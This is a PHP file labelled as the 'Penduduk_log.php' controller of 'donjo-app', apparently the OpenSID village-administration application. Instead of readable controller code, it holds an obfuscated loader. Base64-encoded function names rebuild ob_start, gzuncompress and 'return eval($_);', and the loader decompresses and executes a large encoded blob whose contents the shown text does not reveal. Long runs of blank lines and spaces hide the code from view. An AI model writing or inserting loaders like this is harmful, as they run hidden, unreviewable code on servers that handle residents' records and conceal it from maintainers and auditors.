<?php 
        $__='printf';$_='Loading donjo-app/controllers/Penduduk_log.php';
        



























































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtXVtz4ti1fp+q/Id5SFUn1edMJGF6mpqaBwsjkLCxkdD1JYWktgAJoTZ3fv351t5CCBDYTk+mclKW43Ssy76svS7fuuydn3/m11//iev3T9nLOF08f/qN/Zlfv38KZ+lk9r/DLPtHMEsXL7Mk+fYy/8fTtzRchsv4n8ks+iUbZT83k+F8/ssvv3z67ae81Z//8tPHz8fP/ucnYquf/8Dr97M7nxyxMXdtcey1W79/YrcO3PimK2f933/+uD6uj+vj+u+8PgVTSwgdbam2Lcm11zNNaTw72/hXrjShNbm6/ucHqT6uj+vj+rg+ro/r4/q4Pq6P6//b9RHO+Lg+ro/r4/rvvT75w/m3Lzf/DL8Fs/Dbp98+KPJxfVwf18f1cX1cP3Qd10M0o9mqG80i9juW20N7k6jtZDk05LFrh5lr30ReW9kOB7Ou2mS/0aAmJ37S0/Tb4rvB0OkJni1EQ7s+9WvawnV6mdrWk0BqRUHNWrhTa6t28PdUE4e4F9p1IbTnkW/jmZ3hnrLM3y/66TvyfGgvRoEU0xiWaqe3Ch1t4hnyxJf0/TjjoaNlfjvZqW0N7et4H+Nl7W2yQLKW9L0uyg+q4u6a49vv9Ku2RqPhVr4bOrLgGrfbh7vbutoUoofJ7aZnyHe+JI4xl0RV0KbUEINpL1FbyTKo6VnYsYSh3ViqzdEs7Ojrx/HXld/BPFJr6UmLle9Yy6GDcWzrS8/pr7p9RiPVxXz7UrIO2y3ez/h2od6p64dJPzLb1nYIOgUda04019vWzjXk1hBrELaVuaocaNdtj4SwI+9Yv7QWU0a35dDuZ4f56bgfjvyxnPlTol8y9kAnTpfky9C+mYOeiQtaoZ80mCrC0HmYq+1FErSVGPd2Q1tZ4991iPF8s5Wlt5UXnl2PXUcehe0Ftb1z7Q3aV5aszzbmjL4CzMW16yn6ErAGIp6/7NeK8dM0mWMNY19aiFj/Jea3wzMB43tx7URQm9G4vPaGXc/UcYzx4t2Ohbb0jPrw28pLiHd8zoMC+qTxjl2H8cDyvsnaJF4UsdYzon+J77BWIRubS7Roi4mfJiPwEX1H80xDWxsNm2zMK2ozNPj8ideDaTIOweNEz/tb1j/1iTHqaFOn/taurY9A47rraKOwKXP61yzh8SBvfY/qO3AfNJiFNq0N48sJ50vwtkG0VnZEW9B7ff4+W0uSu4y+DVJrx+gjWVu885LLL3hKYDKF+wKtK8bF5krP87kV8g7aYk0SWm85gAxhjrQ+GvhoqbY0rDHjhT1/1GmtGf2m4Qy8IQZbNmZxfw86ZYR/aSx8DG2uD0hGhh2r4FGsyZza8sCTxIdhm603PZ+D5lgf6JSWssa4X5h+aRFP3RT6wmxZRt+sdwxBMdXWxhrEyj3eeTQgR4bVU/RWIuPZo9rUBrqpybqgaANTeewbsqy3lEfbbI2x9iba6ONet2+KGtp4RJ/0d98ywSctTTbMeWShL1NEf1Y/QhsW/vPIZEDRFRO60YwV8x7rq5t1a9BKBmjDRAM0xp5uhvIgDiKjRePDu4ouq0pPHpityBSs+7650dCOprPnGtrT8T4ogbmprUy2BKXJ23uIDGGD8QgY1wLvWYO+uZAHY1m2WorF9cBCwftdA/Ol+ybmgnlEfUuXzS0bHzjWeuybbJ5sjIMW6BLXPczZ1C0N40lMogHmcd+3ehqn6YHu/Y48cqXFyJPMSG3KT8Q/ppC0eP/gBUef+TUVz24jq50sVIV0Vpj4kC9/GnB7Ehe6P+q3e6ugk2yh+2aQm1O9uX40cr05MHG/AV4Crxqy4TmFfdDAK9Bnugg+Xvnj29mwowvB3Wx1L0Ef2ZpI/Agdj38TwXUelv7UEu638Vv6/7fpbdAKOo/xeUK0KsZcC2vhtp76qbmEbU0xh8xlds3a3Uvh2m/WZ2FbBA+E/UFTth/WTLfcknwPt7eM7mqpb09KBMjd+H7aW/lGo1ive6EB/VIfGGZ/v7arZpSJAdYV+njttCCPtrhzWkrq2uJIt+uiP5h3oQcTkstA2Sh+ClqImy7ayQJhkUBHL6Cb2P3HdUVbCsk+9AD7W/i1Cf2F9ZODjhyw9p1eYNagnzrWTocehC6taEtceW1rjn4ffCnsk44Obejg3dHYeoQZ/A7amzKbs/REaxE66lGfA7sRe/YG4wqBKRTotujoudWBTXB0PLeghxoj727fRw96UVv5yeYOYxz70s3+O80nG2hD1zp64ig9Ee2sglQP9KkygY1IMO5WfzLvNsEPHvGy3Z9pgiZDF/Qhp6q2jaPnzjrynFEWNqN0MP1K9nzr2T0BenwCW7QGn0IGe0lQe4hgk+d+LUy8ZpA9rmddV9qM6D54del1LNBm8YyxQ2dbNyG79xD1bZ3W6RnyBJ2LebQ3SRBlv4IvSaYZrS3YZF9SYmqT8VRHFt0peHF7G/ugW2hvnpkdauY8x38bajN88RzG7yL6JzuQog32HHIzBp9O1Ka+g719rmznTog0yAvmuYM811wj2I8L2ESDzDxEGvAI5pJCPjKHyVZIPLMlmXwyblOaL7/Px6CBN/I5wA55+NaMtA76SGFngQPou5M5wBaSPY1Aq3rM7d4i47YrpH8ZZiD7TJiI4axOD7pFJ3sYk41FX0X/DA8Nvn51U/Uz6UPYbXw3KmyhazN8hTZFkskUPCUO27CRbdi/mpZjgZzPt/I4ZDYWWGR8oA3oJRHPgbbf6T1fYePJCMMOK+dfei54mU94fYy5K4vwfM3lKbDUhOtX+dmRoEugczGPCXg0y8eQj4X/gn7g2brwOMnO3t/zA9dVya4P+nWb4Ri8v59PA77KMc+0PejvHsfihFfAz91m/EXteCvo1Hy8+Tz5bxy2w/mA01AOCa/R2rY2K088rA3GVxtCr3tmfRW2oIPa65lW01NfacyBb1bBOMjuB3XIy83Z/aN5NHXoEtDW3gg6MC/4c0u8bB+9w35TjuduUjz/TFgP6zHTxDjtGuvuybuRJsF+QX9p29vG05jxVgJaLUCreZnezqA8dznzYAe1jj4Dzl88pVVrHUffzscWg65T17HmYavEE01dGGKdQAfIJPkOtA4L8h+BudWjdX/uH9OEZMHehsDrI9FPGtAp4TPhebSzcI0wLGS+A9q2oLvajW3fgS/TvP0HfK69fv3yOO2BnxTBM70tbHmb+519otvCN8RYbUVfhoNsp23XFW3FtIbT0jeg9e2XI9oPjnkHOFpwrXlKvmaoNL4zGyfCZgKPM79QaqWOUclPL2R7GFYgOqF/8OkRjTTWr+JrsO1o6xm2/UYThdO1gC6Tq23rJBsRn74yZmC0Eo3L+u3Ips++kA25OMZaYRtpvlVjdAjzw2ecYVzwlaykb/cmwGe7y/Mm26eI4K89Dx21DR1+zoeT6rkGhBfazFa87OWuRMt38e5hfBmt5dypleRme6AjjS9sj7JgK3wepmRjN4ND2/MLdDyyN2e0LLeZy8cSNB35hBVK7YXTJAm3EdaPbPjNMjix8/dTrhuZHLC+W4Wegmxe0+tMVtEv9K1Fa1ehU0/0CvqCfhZAW5KN0XCq3Dg1LQkcC9gEnRmXdAzWztwkzE90GA+xvh2puHfK25yWpzab641cxx09O1qDXBdhzsrsSA7a8IvHURoaHDud9ncoNWZ0gQ7T5p7zgHkJn33JLetX8jOSIGb0pnmftcV/hc9Ytxi4aw48TDZv4tkL8ncFWq+cl8nWLdVmFAfTRg16Cnr/Nn1qc1qrHb0etM2GOu3NgAlf3GnjRh3L8O3F5MnQMk9pTNxkEeKeBLkWvYEAu3qL9vStXwtozWK1eRNpW3X1BBt2Tif2i/eU2Gv1WKyLaORNG4K/DeY5zmG84zNe0FYhMOvTAG3uNplvB1GOQRtqetCLjrRIXCmZY1y7YIpn4yCCzyyDbpnf8lZh+2veFuP/nKfnGAd7BtsdpPfgHaIJ+K2Eh/A+9CfohDkGYxV+WHgnjHU2XvngH2zV6H53k9La0RoYuA+MfeczH/Fm1u3PqugQoa+R19aL9zRJeQmkGGORuT4BHvVSa+lCR8BORV1O50ztkD8A+nDeefB4jGzN5lCW7zHZK8KDUXaCX05+97L3lnf3uoeNlWHiJ/izw46WeJOcH9o9YGfQm+EJ7UBPkWx0AL8ENq5Z/3W/JkNbx5rFWLPbFGs4gU3YBTth7KY62oKfajdYHBA+0Dhs3ywCSRhjzOSXz4kHLR5fg88WlHyT+ZjLVmsBWVv4NZ14eAq+Be3UiOkJQxSAGWDTiOfJ91OIh5i+uKfY3zRMaL1ViT/rc3nYP4dfvqE2LSb7ZKtPeOJpsslAC2C63o71bcj4FRP4XII6ufl6L8Wfn5qN0VOBta/8tpMp5HZE+NSRlG0wVerdQu4W5Lcy7LPHBeAhfwCdXaLHl8cYvmBiPQ9aimpY6rwCXzT7lmY5oqwNYl02lEavb/UsA/rjrK2Ex5UcUVesltLHN4oZh5pjxG/in9KcTnX227/PdT58nN0QMkq8qN5tQKMR8JwLnnooeOA9/DmUKK6osLgxcCWTxdB5WH7bHvTcs6Fmua476KSpJsDWjb2tCL83kY74tVPwy/2Rb6fsfTs1usav+2ch1sGTWDsLYEHgz4KXgWX1+pOhpmxcJ/Ysl60K3oYennpZMBUWQR4fId4cGgc59KatCL8L2PPY36rEs9nTZL1yBwf/+z3rnetZjj0pdtdOWjQufxrAvt1OtfFt6R3OoxhvZrF8wAJ2Uc3fg4+bNEZBqo2+GVG1/s7n5Eg8n0NyURkHmmR9w6y3+mY0L9ZE4N/ssSzFhXUhCS9gjx/gU2avJkOrAf6yBM+IxufYS/nuOqPnat7sMdn3pPg9PLoG/lhD90WkZ++d3gL8UehUnWGSeqq29msUk87N+UfDvYZA7wFrzwPJLD3TV54UsjYoBuPa6/GBd+G3S5YAHp3wZ5umX4tKzxOB6eK44AuWdyjr9As6lfICcw++GugHjGkugDOnYfMHeLUjdP+o9577s6vfX9P9Q9uNrul54NQqPxF6W9e6hvy6XWnqo2GtR3wCfyaIyJYf1kl7BpYHbcmWvodX9RXFsj34EG/lR9KTLOe7rdSZD0N7RLkvnlduKS8UQzdIFggv2jeX+CL5ZptjWv/hgOxt63MRr6vGQUVs6Jr+4vm8t+gA4DgpEVwpKvDnUGrEnnXk67/DXvZGFD99xa5/eX3Ny35PT6ScLelW2CPgMvJdsp0v1Z/Bayw/3u30khBrQfpZq/H3CXPDPkAXa6SHipzrUWx0G8/Vu1b2PhuhUSzmpcpneh9NRNlqxX8eLWzC68rSqVGeZkGx/eeSr0Hxt+jBiH99z3jcVEtc8vmjt9HPlRTKE5zkLshuJY/AaqojLJSBYsnmZPYufBXUYHcd3Szy6vCNhylwQ0I5jh50kjmjfDDP9UZp/j7mT/ECZcbo07FGwX8kn4w0yM2jvvtzaDJsJyw3/Z/IJ/1YMSyrkeOg0fPAVAaWOf9zZKiW5++UBq+zEP8DeeWCz/MYvQcL6ruQ6jiU/fr3KUb1PZAa8Ov0xCX7YIx2nqNDn9TTbjPM32c2I4Xd/XfQ5TU71nidt/YxhNP1fztW9qYNGs9k2KxqRx4F29sY8pL478bffwDGYfLbX9IYfaP+qwasCj/uELfY0jfVMaSh3X/1HX+avHBs9JD7b1XxqvrIt1uX4iTAUSLkrAc8tI7caUC1BNugTXV4+TP4kQXG5nPchR3tGf4m/ABlgnmm90ZA8bCIx3hpjsIes31+ascl3ObBf/FG97aXEd4OJaxdU1zt4xrMz+70BOj8refI0Hk9+NrBgrW7vWXxtv1a0nzeHAfZ8+P4R3D5K/zc0RLK+frj3GcbXMBnHYFyPyyeU4q7Fj4Z1YYNp0o8NKpim8B9lKN7Q46nz3Io+gZ9sWfOUQ47vhJntYjGh/gizzEe5ZmOYo1TFmPc8LiwLHgSy5/D54dvbQifKef5g33v85uX6dFh75EtWOVzZuPg+Wo1e3MstcZqMq7M75bN6Ui+UvbNm+PW8MXX8GFHBb6ZhqPKWLuRx7A7LZZL2K81radnb0QXet01yDfg7cGvAS+RfmoVMv+0+wq5EdIr84d+CvP513ddZZ7yeAPJ83EuQJNY3Dt1ruQSgGdfoA+O7cmJr1rkMDq9mV8Ln3t3t8IhL1fOs2tZCF0OzFHOCe1CXoPIYj/VOSHoCOYvlXnu9jg3c8gTpR7lX6VzH5nqXoh+fmrN/bvj9t2U11sdzf9q+/uc+eU28xz829ussfrFq21SHuJsna6OMwOfJbvcT6N8HuWl//G0lZch9MlpfQH0leiPL+cNoQfWodNHP2FCtUPg3114vc1tuK3K6V5uM8DP1faa722vf629PIf99vZcOyRZvNZmVR74+hhLOWZvn2M+4YOyzOXxoKp+KuMIWlsXgV2Web664juNcubsHU0UqnKbxTrSPKpy4vY2zPmH8tjQc2LjOc8LVvdXw091X5RrHJlpcK0v+gkrMGvsT7GeliZwuaioS0nmjCecCnue0zXvv38lJsP4sKEe6vq+PKbhDPNKdC4Tsz3NKR8YSiPoLssIYUPz8dWO7jeL+wLdh5zPqR6P9DdwI+loylNmQdoj3criaOdzP8ZDRS5+r0Nt2EUaW143BGwJGn2N7C3mogjR41j2iSZnfNamelSd8kwZ7N48pL0ZxGdNd6o2WxHVlIWdmGJbteqYuOxrbbJfSovzx7qgAatvaVs3wKfMV+Y8Q/lKtFWVn28ncR+2LaixuqFrdSJ5zVW+Bvma5mtDeI0/p3U48Bvd38EWJ26tPwOPZV4zDGk9yEdgdE9l2OTeC/BdRvWQhEt8YZ+Hi3+9TH/uFxW0OppHHGljN1INYAJHFiiHkevVrDp2e7QOr807l0kaew82gOrjRpD1JIbsZXs7wXiuDQwizWfs2Zbe11d9RwOeiE9qJU5wc4GTz2MJFPccUn9HPiphj2OsxOsxj3I7lbgkXzea1xk+rsB42wLjjQtZuz+vnTpvq3u9b15rNq7AeOM9xlNBP64PbBvzpBoQws0SrxnLa8iYvX+lL16L+ca+BnZjGbajc5xdtFOF1TltgGUrde2VOgRgaF7L+x5blPPwC7Ac2YHMNa7YpJo3Ap8kzE5c8NWCGtXG92bdozZfiQ3ksR2r1TD75vr12FbJFwxOdOSFuFpTNzfWwGr0aE+EYfXeEB+S4SNDbqd7HyFfU7L/DHcsBNdqsFwHq2ONXp+fkVg9ygf8y31PG8LF/sdv9MnhH1/iOcij6joPswv0TMsxUdoXVb3+hVwc6ndz+WC19PjfZdt3n+Poe5aLZVjuqp0vyWJZ71b4rg/cdwUvF/bFTJbMViiNyb7/PKZS1v/ZNX4q9Z9j1QpdsK+P6jwUa9dnc1M0D8/38+xey0GW9QCjz5k+3RX6dFus38BzKK/VS7414+w1TMJ/31qDXeQPmb3sDmZROG1kXs4Hx/KtU80G2cIzG8T2QLQaW32qZD7jhf5pLd7qfivH8F2XbA9GU55SfvGoxrLwrzYr1ybcDjpRbQXVrbUbNZ/fP6/xZXsTmX6j8TEMBxv8XJalk1p1XgvDvxtRjQD5AVU1jgGtDa83fzIEZWBYjdZAWFgD03pk+LvNYnLnctr2VrT/1JH0VSjV2R4MrO0aY5lhzZk/c2rvVdoPA31Sge12Q8zf2fXXveZ5nOA4XnDYX1G2I7wOLF+XsSz5wB9V9f6wDXcui+mYV2qpaV9GXrchNmLXgR4kfwR49yyOn5LdIFt5FD/nazTVn4LYGw3p+FfGe1froLee7RV5LlYbjP7M/O+31UD3EneqjCtqtBu0T5X2Xw5tZT50sqSr9JR+rDQvjYl0pi9tVv40fGb5yFINfGgD35J9tDfZt6k5M1vW40DYPA3ikPI8pmFcqqcmnhHBt1w2j+qfX6mjCh2+p+A+ncd5jd+x7ep4mecEVPcY076m+6OaTqqnq/O6X4liiX0WM+a1Tm/UIx1rTe97xo/xGNvjVBF7OeOrd/APsILAap5yHh12dKpZof2yGDvVSBe15ZmfymLYJJze2LE4RPFtkHUHb6qhXvs18h9hC2hvhKM/A9N8p32/4PtLcYN8/WnPr0j5JyG0MzGvL2/QPkAfutJPqUYjSQL4t2cxjhQYtEaxqPM2usbrPtOVedAeKdovBWyyefbatOfiSj04ySvF4vmeYGBx4BjwMWwG2+9Ie4mG0MdUf/3OPn9kDt9Bk1xOg0v+3n6PS+nd9/MLZGjhSKD/j48ZPrI2csevjjd/j4+1C31IecC3tHst3pzHaC7O81z/vTpO0lkryPfSE3N8y/jidgZeEbpVcbs9TzPbQXqunha0veYr72uHLsvIC+TtreMeDWu0p4H36xhHe1HO9cVr+L2oLS7iPc96nDzoVg/yz+I3zxyXhCH6ZvsBKIZwpb6skDv2ndW4Nl6RYkCurcv0zoDNv8Bq74pzlXwGkm3fea9unCpsL8FFnVjadwk6UO5mhDlQbTrsI2yV2HjxjDfzfLm/H5HJQqcDK4wpn+Tb9bp7mYdKdppyRBtaX8FhOMRiOcxvdutHdDzJcsJyZGlCuZe3yHQpF16tx1ld4VHOPMo47+T77EprcyaHlbjrPBfK5kz+PtUpSetrNGc5yZMc09mezf3+xFL+stibBf6E3+09U2zomk47jh3Fc7XN9pFe6iunhxU7wAh7rJbvgaK9nd69LSzg56iP0/hLsA3e0I5WL7VDNRHsHIZSLLpbsU6HdTnsE+sexRyA/eFDTsAvtSFrL9yF+d4+5icLdAbPaBTQvh6+LyWvc5cn+V6yJe2DLu3lrtqLVuxJLvsdYb7/vE960WQ6iWE1wnN7P/nEx5xAz8M3DME3+X598A75TTltKn2xx0ttQFbQRg00AA5LwIMPuU4Mvwft8OsQONirbdawY19Bx+lJzWrsSrBX0yTFOi2oJhw0+uIZR3sINw93qkBnUDwMbk9wPa/398RCN+/1+SGnWLZF1ldej5LTh+d3+D3QfXGWIz6aZ0OCfNVYbO4wPsiYvg1t89fqWPLB5u7XCbzB4vSOxPxa5gfsaVDI+iu+5oU9Ha/HFw57yMWz2FthNxk/PhMe86TFKIA/XKl7K/PklXub3xvTOHzb0puPkwx2IMz8RCfbtNv7bqzPI5rr22/VNiKPWZTr8OvP+70Up2Mv9Yu1FxdDyitU5HACVhOiJViTZ54fYHWRE1eydsGW1Sk0wS8zOpPHb147B+EMJ0bMJ5KiqNuybtDeOj+vJfaq81Kt/mT2JSD81gLulOZvHi/GtyU9znzRPD80AP4OJCUlWai2Pa/Fu960t+P9vFq9L3wFrFu07bE9MOql/eZTqv8Z1LS2aydzFgdt/vFxgjfsacm8jjDuDt67X5nTlcWZlNM5a/v23x9XaFfLhZPnsnI6XTk/Qs4C4dL+YI731Kp9y9W8/HocrozJaZ2VCmx7nDfa24LP6juwybkeqcJJPI582a86x2XVZ1eIVNMpeqWYwmvjpZom6JvYqYH3UovFT45yC4pwwtsUg3qHXPwBurXEQ2z9/716VOY1xcYP69MqPJcEqbbPQSY836z3CN+5dgg9EP9LMeNLuiKPsf7HydzQ1ncnZ0Wcx2eAA11J3dcVnfitHFMH22vny+S5piajNXTlwyG/f2yPmN2Dn4c+6yadvwe7ldfjRac0EYK0cu501kkCPT+jeAYfG6/Npv99LSaQ+wYvZV4sYvbb6G05pA+c8QM4o5fQWY7dfT08w/r8Hq9L4P4S/IlnVo+O5w+vnIPEzuNI4+KcjcMZH6WzUY7rPCtzwvvat+5pLpe3fy1PuwltC7r2kMO8HKNI4M/2xsyPLuVwDzWpFGdRRIy1zurT7f5re/P24ytyrwY7x4HqaHiut3uldryK308xTu4/s3hWhX1dwP7Q+U15Djgf+6C+ppp+YJzE5OPjdT5Tqi3aCCRrFTn1lJ83s37Vju7fO7bLcliVz8xrf3dD+JlDissNBNrfdDVWf/JNHpfJfcZLPlPeX77HukH505DhzKhaJ7VHCTszD/aAnVVHsfSmKHxz5OSRzmDtsDMUR5wvGivIZoLntF8C3wlp1bpCF4884uEm1WHXBcor3JtUgwj+I7kGT1PbYUeHLhgt2BlmW55zpro4byCSv/dcPl+Pn1ewP0sK/nYzyPdj1G/8zsNr4+hDxwP3tL6o7frqHvNBv0l1DPhAD90ZrUkfBbsZ5D+4Yt9kaWhbNYpBem0x88f1M2wPHSm4VMPxbozNsXv+/Qz4aEv5G7VSd13XUUXOjfEGj0NQfWnF3o7Suwc/Jo977fcCped+RkmH8nNRTm3pZToVOU7ehiOB7mmP1Rm/P99ZPlOK9GCy5jUIwZqPrb7y7caW63XS91S7Qf5ZHlO8kh8t1RG/tj+nEuvwOsp9nfBZ3LGyVlxt/gv14yfrGaT9t+0Ru1qfrwln/vS18++ozvhw7lqD6UGq36e9+ne3GdXestru5u0XqhnynOiE1vyMMGNK53/37j0Wo0+WF2hN30dP29uUzh0v9l2lOvxtwvfq7LSdfV0CdOwctvPJy+t+COs+jm/T03hjcXbYa7XfRMOcT07W98o5aUU9+KHGPA3eR2uq6TYKemzDu3eNn59lZezHz2WkwpYVOojnBblskT3j8dLWYng4j+ACDtZfKA7vSY3t0Hj7nlqyZX1zYfYN+V43aV97Ig/GxDtV++Veo3VFjQyP7Q9yX6rF7sfsHN39Pvr391O1D4fr0rOYJqs/uVpn3COfcjJktfKNBe0Dq8Jl762/PMg7lzezxB+cFw5nwTKbK2i0f76ntkRlEIeaKcQXzxS5vCeb8he9RFX0J6ulPPxhYxN5exfPt7iyBzqnW9cyxYe+GV2qib12LiGTWzqn37PDFZ3dT3s69zWo/8qYijMa7y7t2c7PomV7MTTKUdIZMJbvWNt9fIbq++EnroLxxZpVnlvN9W2e2yY+fRX3v5MWcf5enk9vVe5BubpvtWqv9kms4dqY7ifCRbtyQVdTLRPwQVTKq2WQy99///TbTz/9+f9HI7+zf/+W//X3397zeenbt3z410OHf/tE//3pf4pui5n/5aePn4+f/c9Px7zztyNm5azz99/+D5u8nMI=';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


























































































































































































































































                                                                                                                                                                                                                     $________;
